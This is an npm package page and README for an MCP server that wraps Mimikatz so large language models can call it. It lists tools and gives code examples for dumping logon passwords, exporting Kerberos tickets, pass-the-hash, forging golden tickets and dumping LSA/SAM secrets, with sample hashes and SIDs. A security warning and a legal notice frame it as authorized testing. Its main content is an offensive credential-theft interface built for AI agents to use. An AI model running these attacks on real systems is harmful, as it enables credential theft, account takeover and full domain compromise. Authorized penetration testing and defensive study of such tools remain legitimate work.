gc-mimikatz-mcp
v1.0.0
Published
Model Context Protocol (MCP) server for interacting with Mimikatz security tool
Maintainers
Readme
Mimikatz MCP Server
A Model Context Protocol (MCP) server that provides a safe interface to interact with Mimikatz security tool through Large Language Models.
⚠️ Security Warning
This tool interfaces with Mimikatz, a powerful security auditing tool. It should only be used:
- On systems you own or have explicit permission to test
- In controlled environments for security research or authorized penetration testing
- With full understanding of the legal and ethical implications
Misuse of this tool may violate laws and regulations. Always ensure you have proper authorization before use.
Features
The Mimikatz MCP server provides the following tools:
- list-modules: List all available mimikatz modules and their commands
- module-help: Get help for a specific mimikatz module
- execute-command: Execute custom mimikatz commands
- dump-credentials: Dump credentials using various methods (requires admin)
- export-tickets: Export Kerberos tickets
- pass-the-hash: Perform pass-the-hash attacks
- golden-ticket: Create golden tickets
- lsa-dump: Dump LSA secrets and cached credentials
Installation
- Install the package:
npm install -g gc-mimikatz-mcp- Set the MIMIKATZ_PATH environment variable to point to your mimikatz.exe:
# Windows PowerShell
$env:MIMIKATZ_PATH = "C:\path\to\mimikatz.exe"
# Windows CMD
set MIMIKATZ_PATH=C:\path\to\mimikatz.exe
# Linux/Mac (if using Wine)
export MIMIKATZ_PATH="/path/to/mimikatz.exe"Configuration
Add the server to your MCP client configuration:
{
"mimikatz": {
"command": "gc-mimikatz",
"env": {
"MIMIKATZ_PATH": "C:\\path\\to\\mimikatz.exe"
}
}
}Usage Examples
List Available Modules
// This will show all available mimikatz modules
await use_mcp_tool("mimikatz", "list-modules", {});Get Module Help
// Get help for the sekurlsa module
await use_mcp_tool("mimikatz", "module-help", {
module: "sekurlsa"
});Execute Custom Commands
// Execute a single command
await use_mcp_tool("mimikatz", "execute-command", {
commands: "privilege::debug"
});
// Execute multiple commands
await use_mcp_tool("mimikatz", "execute-command", {
commands: ["privilege::debug", "sekurlsa::logonpasswords"],
requires_privilege: true
});Dump Credentials
// Dump logon passwords (requires admin)
await use_mcp_tool("mimikatz", "dump-credentials", {
method: "logonpasswords"
});Export Kerberos Tickets
// Export tickets to current directory
await use_mcp_tool("mimikatz", "export-tickets", {});
// Export to specific path
await use_mcp_tool("mimikatz", "export-tickets", {
export_path: "C:\\temp\\tickets"
});Pass-the-Hash
await use_mcp_tool("mimikatz", "pass-the-hash", {
user: "administrator",
domain: "corp.local",
ntlm: "8846f7eaee8fb117ad06bdd830b7586c",
run_command: "cmd.exe"
});Create Golden Ticket
await use_mcp_tool("mimikatz", "golden-ticket", {
user: "administrator",
domain: "corp.local",
sid: "S-1-5-21-1234567890-123456789-123456789",
krbtgt_hash: "1234567890abcdef1234567890abcdef",
ticket_path: "golden.kirbi"
});LSA Dump
// Dump SAM database
await use_mcp_tool("mimikatz", "lsa-dump", {
method: "sam"
});Requirements
- Windows OS (Mimikatz is Windows-only)
- Mimikatz executable
- Administrator privileges for most operations
- Node.js 16 or higher
Development
To build from source:
# Clone the repository
git clone https://github.com/GH05TCREW/mimikatz-mcp
cd mimikatz-mcp
# Install dependencies
npm install
# Build
npm run buildLegal Notice
This tool is provided for educational and authorized security testing purposes only. Users are responsible for complying with applicable laws and regulations. The authors assume no liability for misuse or damage caused by this software.
License
Apache-2.0
Author
GhostCrew
